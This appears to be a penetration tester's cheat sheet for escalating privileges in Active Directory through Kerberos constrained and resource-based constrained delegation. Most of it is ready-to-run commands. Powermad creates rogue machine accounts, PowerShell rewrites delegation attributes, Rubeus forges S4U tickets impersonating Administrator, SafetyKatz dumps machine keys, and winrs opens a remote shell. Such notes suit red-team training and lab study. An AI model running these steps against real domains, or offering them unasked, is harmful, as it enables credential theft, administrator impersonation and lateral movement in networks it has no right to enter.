resource-based-constrained

Privilege Escalation – Constrained Delegation - Kerberos Only

It requires an additional forwardable ticket to invoke S4U2Proxy. We cannot use S4U2Self as the service doesn’t have TRUSTED_TO_AUTH_FOR_DELEGATION value configured.

Methodology

1. Create a new Machine Account

2. Configure RBCD on the machine configured with Constrained Delegation.

3. Obtain a TGS/Service Ticket for the machine configured with Constrained Delegation by leveraging the newly created Machine Account.

4. Request a new forwardable TGS/Service Ticket by leveraging the ticket created in previous step.

Get machine with constrained delegation using PowerView

Get-DomainComputer -TrustedToAuth

Get machines with constrained delegation using ADModule

Get-ADObject -LDAPFilter "(msDS-AllowedToDelegateTo=*)" -Properties msDS-AllowedToDelegateTo

Create new machine accouunt (use Powermad.ps1)

By default, any domain user can join up to 10 computers to domain (ms-DS MachineAccountQuota is set 10).

Import-Module C:\AD\Tools\Powermad\Powermad.ps1
New-MachineAccount -MachineAccount new_machine_account

Inject original machine account TGT in session

C:\AD\Tools\Rubeus.exe asktgt /user:machine_account$ /aes256:<MACHINE_ACCOUNT_AES256_KEY> /domain:<domain> /ptt /nowrap

Configure TRUST_TO_AUTH_FOR_DELEGATION

Set-ADComputer -Identity machine_account$ -PrincipalsAllowedToDelegateToAccount new_machine_account$ 

Convert password of new machine account to NTLM hash

Rubeus.exe hash /password:new_machine_account_pass /user:new_machine_account$ /domain:<domain>

Obtain a TGS/Service Ticket for the machine configured with Constrained Delegation using new machine account

Rubeus.exe s4u /user:new_machine_account /rc4:<ntlm_hash> /impersonateuser:administrator /msdsspn:cifs/original_machine.domain /nowrap

Request a new forwardable TGS/Service Ticket by leveraging the ticket created in previous step (S4U2Proxy).

C:\AD\Tools\Rubeus.exe s4u /tgs:doIGxjCCBsKgAwIBBaEDAgEWoo... /user:machine_account$ /aes256:<MACHINE_ACCOUNT_AES256_KEY> /msdsspn:cifs/<target_machine> /altservice:http /nowrap /ptt

Access the us-mssql using WinRM

winrs -r:<target-machine> cmd

Resource Based Constrained

With GenericWrite or GenericAll on a computer, you can enable constrained delegation to laterally move

Methodology

1. Enumerate if the compromised user has GenericWrite or GenericAll over a machine (BloodHound recommended!).

2. Compromise or create a machine account.

3. Set RBCD on the target machine (the one you want to access), allowing it to trust the compormised or created machine.

4. Impersonate a high value target only on target machine.

Powershell

[!INFO] Remember to follow the Powershell methodology

Powerview

PAY ATTENTION: If we already have compromised a domain machine, we can skip the machine creation part and use its AES key (SID: S-1-5-18).

Check for GenericWrite/GenericAll:

# Save the Domain SID
$DomainSID = (Get-DomainController).DomainSID

Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "$($DomainSID)*" }

Check if domain controller is at least Windows 2012:

Get-DomainController | Select-Object Name, OSVersion

Check if ms-ds-machineaccountquota is enabled:

Get-DomainObject -Identity "dc=contoso,dc=local" -Domain contoso.local | Select-Object ms-DS-MachineAccountQuota

Check if target machine doesn't have msds-allowedtoactonbehalfofotheridentityattribute set:

Get-NetComputer target_computer | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity

Create a new computer object: https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1

Import-Module Powermad.ps1
New-MachineAccount -MachineAccount fake01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

Active Directory Module

Configure RBCD on target:

$comps = 'fake01$'
Set-ADComputer -Identity target_computer -PrincipalsAllowedToDelegateToAccount $comps

Now, let's get the privileges of studentx$ by extracting its AES keys:

SafetyKatz.exe '"sekurlsa::keys"'

Get TGS for HTTP service by impersonating Admin

Rubeus.exe s4u /user:owned_machine_account$ /aes256:<owned_machine_account_hash> /msdsspn:http/target_machine /impersonateuser:Administrator /ptt